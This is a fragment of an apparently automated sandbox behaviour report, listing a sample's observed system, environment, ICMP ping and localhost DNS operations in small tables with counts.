System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 999 milliseconds (0.999 seconds) |
|
2 |
Environment (9)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = OutputEncoding |
|
9 |
Network Behavior
ICMP (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Send ICMP Echo | source_address = 48.238.12.0, destination_address = 128.84.17.1, timeout = 4000 |
|
3 |
DNS (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Address | address = 0, host_out = ::1 |
|
4 | |
| Resolve Name | host = localhost |
|
1 | |
| Resolve Name | host = localhost, address_out = 0000:0000:0000:0000:0000:0000:0000:0001, 127.0.0.1 |
|
1 |
